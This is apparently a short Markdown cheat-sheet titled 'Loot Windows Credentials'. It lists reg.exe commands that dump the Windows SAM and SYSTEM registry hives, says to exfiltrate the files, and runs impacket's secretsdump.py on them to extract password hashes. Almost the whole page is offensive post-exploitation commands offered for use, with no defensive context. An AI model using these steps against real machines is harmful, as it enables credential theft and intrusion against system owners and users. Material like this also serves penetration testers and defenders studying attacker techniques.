15 lines
219 B
Markdown
15 lines
219 B
Markdown
|
# Loot Windows Credentials
|
||
|
|
|
||
|
|
```sh
|
||
|
|
reg.exe save HKLM\SAM sam.bak
|
||
|
|
```
|
||
|
|
```sh
|
||
|
|
reg.exe save HKLM\SYSTEM system.bak
|
||
|
|
```
|
||
|
|
|
||
|
|
* Exifiltrate and use impacket
|
||
|
|
```sh
|
||
|
|
examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
|
||
|
|
```
|
||
|
|
|